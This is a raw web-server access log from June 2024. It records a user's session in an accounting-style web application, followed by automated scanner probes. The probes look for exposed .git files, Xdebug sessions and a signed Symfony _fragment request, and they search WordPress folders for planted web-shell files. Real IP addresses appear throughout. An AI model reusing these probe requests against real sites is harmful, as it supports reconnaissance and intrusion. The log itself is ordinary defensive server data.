178.115.76.236 - - [04/Jun/2024:19:05:52 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_6&tag=debit&refobject=10338214&value=P97-K2-&ser=1717515931516 HTTP/1.1" 200 294 "http://hausegger.activities.at/entry.php?id=10830&&object=10338214&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:53 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_6&tag=debit&refobject=10338214&value=P97-K2-0&ser=1717515931813 HTTP/1.1" 200 294 "http://hausegger.activities.at/entry.php?id=10830&&object=10338214&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:53 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_6&tag=debit&refobject=10338214&value=P97-K2-02&ser=1717515932068 HTTP/1.1" 200 281 "http://hausegger.activities.at/entry.php?id=10830&&object=10338214&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:53 +0200] "GET /entry.php?id=10877&mode=loadSearchArticle&obj=article_6&tag=debit&refobject=10338214&value=P97-K2-026&ser=1717515932292 HTTP/1.1" 200 281 "http://hausegger.activities.at/entry.php?id=10830&&object=10338214&account=&mode=documentdebitor" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:56 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1958 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:56 +0200] "GET /gui/javascript/form_form.js?1717520756 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:56 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1721 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:05:57 +0200] "GET /gui/javascript/form_form.js?1717520757 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:01 +0200] "POST /entry.php?id=10889 HTTP/1.1" 200 1832 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:02 +0200] "GET /gui/javascript/form_form.js?1717520762 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:07 +0200] "GET /entry.php?id=11270&document=10338214 HTTP/1.1" 200 1976 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:07 +0200] "GET /gui/javascript/form_bu_document.js?1717520767 HTTP/1.1" 200 2675 "http://hausegger.activities.at/entry.php?id=11270&document=10338214" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:07 +0200] "GET /gui/javascript/form_form.js?1717520767 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11270&document=10338214" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:08 +0200] "GET /entry.php?id=11241&images=false&document=10338214 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11270&document=10338214" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:08 +0200] "GET /entry.php?id=10877&mode=observePrint HTTP/1.1" 200 58 "http://hausegger.activities.at/entry.php?id=11270&document=10338214" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:42 +0200] "GET /entry.php?id=10271&&ser=520741 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=520680" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:06:42 +0200] "GET /gui/javascript/form_form.js?1717520802 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=520741" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:07:42 +0200] "GET /entry.php?id=10271&&ser=520802 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=520741" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:07:43 +0200] "GET /gui/javascript/form_form.js?1717520863 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=520802" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:08:43 +0200] "GET /entry.php?id=10271&&ser=520862 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=520802" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:08:43 +0200] "GET /gui/javascript/form_form.js?1717520923 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=520862" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:09:43 +0200] "GET /entry.php?id=10271&&ser=520923 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=520862" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:09:43 +0200] "GET /gui/javascript/form_form.js?1717520983 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=520923" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:09:59 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1880 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:09:59 +0200] "GET /gui/javascript/form_form.js?1717520999 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:01 +0200] "GET /gui/images/progressbar.gif HTTP/1.1" 200 2157 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:01 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2434 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:01 +0200] "GET /gui/javascript/form_form.js?1717521001 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:01 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:01 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1910 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:01 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
178.115.76.236 - - [04/Jun/2024:19:10:02 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
83.147.52.49 - - [04/Jun/2024:19:12:13 +0200] "GET /api/.git/config HTTP/1.1" 404 301 "-" "Mozilla/5.0 (X11; CrOS x86_64 14588.98.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.59 Safari/537.36"
198.199.110.12 - - [04/Jun/2024:19:22:47 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
92.154.95.236 - - [04/Jun/2024:19:42:27 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
34.78.68.58 - - [04/Jun/2024:20:04:58 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2"
94.232.247.193 - - [04/Jun/2024:20:26:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
94.232.247.193 - - [04/Jun/2024:20:26:31 +0200] "GET /_fragment?_path=_controller%3Dphpcredits%26flag%3D2&_hash=jgGdbh/dMjEGAyL7twsITnvWxjr4VwpVdC/td%2BX9RH8= HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
83.97.73.245 - - [04/Jun/2024:20:31:07 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:42:47 +0200] "GET /wp-admin/maint/index.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:42:56 +0200] "GET /simple.php HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:43:05 +0200] "GET /inputs.php HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:43:14 +0200] "GET /wp-add.php?a=c HTTP/1.1" 404 298 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:43:23 +0200] "GET /wp-includes/Text/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
92.154.95.236 - - [04/Jun/2024:20:43:31 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:43:33 +0200] "GET /wp-includes/ID3/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:43:44 +0200] "GET /wp-includes/index.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
92.154.95.236 - - [04/Jun/2024:20:43:48 +0200] "GET /owa/auth/logon.aspx HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:43:52 +0200] "GET /wp-includes/certificates/index.php HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
92.154.95.236 - - [04/Jun/2024:20:43:59 +0200] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:44:04 +0200] "GET /atomlib.php HTTP/1.1" 404 299 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
92.154.95.236 - - [04/Jun/2024:20:44:11 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:44:14 +0200] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 312 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
92.154.95.236 - - [04/Jun/2024:20:44:23 +0200] "GET /centreon/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:44:23 +0200] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 312 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:44:32 +0200] "GET /wp-admin/includes/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:44:41 +0200] "GET /wp-includes/images/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
92.154.95.236 - - [04/Jun/2024:20:44:44 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 ANSSI security.txt fetch (https://www.cert.ssi.gouv.fr/scans/)"
91.92.244.2 - - [04/Jun/2024:20:44:51 +0200] "GET /wp-admin/css/index.php HTTP/1.1" 404 306 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:44:59 +0200] "GET /wp-includes/pomo/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:45:09 +0200] "GET /wp-includes/rest-api/index.php HTTP/1.1" 404 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:45:18 +0200] "GET /wp-includes/fonts/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:45:29 +0200] "GET /wp-includes/js/index.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:45:38 +0200] "GET /wp-admin/images/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:45:47 +0200] "GET /wp-admin/meta/index.php HTTP/1.1" 404 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:45:59 +0200] "GET /wp-admin/network/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:46:10 +0200] "GET /wp-admin/user/index.php HTTP/1.1" 404 307 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:46:21 +0200] "GET /wp-includes/assets/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:46:30 +0200] "GET /wp-includes/block-patterns/index.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:46:41 +0200] "GET /wp-includes/block-supports/index.php HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:46:50 +0200] "GET /wp-includes/blocks/index.php HTTP/1.1" 404 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:46:59 +0200] "GET /wp-includes/css/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:47:08 +0200] "GET /wp-includes/customize/index.php HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:47:20 +0200] "GET /wp-includes/IXR/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
192.44.68.191 - - [04/Jun/2024:20:47:28 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ba0194857554d1e1cb6b36dc6cd09f6f HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.162 - - [04/Jun/2024:20:47:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ba0194857554d1e1cb6b36dc6cd09f6f HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
91.92.244.2 - - [04/Jun/2024:20:47:29 +0200] "GET /wp-includes/php-compat/index.php HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
192.44.68.191 - - [04/Jun/2024:20:47:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ba0194857554d1e1cb6b36dc6cd09f6f HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.179 - - [04/Jun/2024:20:47:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=ba0194857554d1e1cb6b36dc6cd09f6f HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
91.92.244.2 - - [04/Jun/2024:20:47:40 +0200] "GET /wp-includes/PHPMailer/index.php HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:47:50 +0200] "GET /wp-includes/random_compat/index.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:02 +0200] "GET /wp-includes/Requests/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:13 +0200] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:21 +0200] "GET /wp-includes/sitemaps/index.php HTTP/1.1" 404 312 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:31 +0200] "GET /wp-includes/sodium_compat/index.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:40 +0200] "GET /wp-includes/style-engine/index.php HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:48 +0200] "GET /wp-includes/theme-compat/index.php HTTP/1.1" 404 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
91.92.244.2 - - [04/Jun/2024:20:48:56 +0200] "GET /wp-includes/widgets/index.php HTTP/1.1" 404 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
47.128.63.172 - - [04/Jun/2024:21:10:26 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.32.118.167 - - [04/Jun/2024:21:10:48 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.1218.1399 Mobile Safari/537.36"
47.128.34.139 - - [04/Jun/2024:21:11:26 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
207.148.79.140 - - [04/Jun/2024:21:12:01 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.7833.1705 Mobile Safari/537.36"
192.44.68.183 - - [04/Jun/2024:21:15:56 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7136a3245ca943b30b27d11aa4d6697d HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.134 - - [04/Jun/2024:21:15:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7136a3245ca943b30b27d11aa4d6697d HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.183 - - [04/Jun/2024:21:15:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7136a3245ca943b30b27d11aa4d6697d HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
192.44.68.134 - - [04/Jun/2024:21:15:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7136a3245ca943b30b27d11aa4d6697d HTTP/1.1" 404 364 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
185.224.128.43 - - [04/Jun/2024:21:37:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.236.176.200 - - [04/Jun/2024:22:28:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
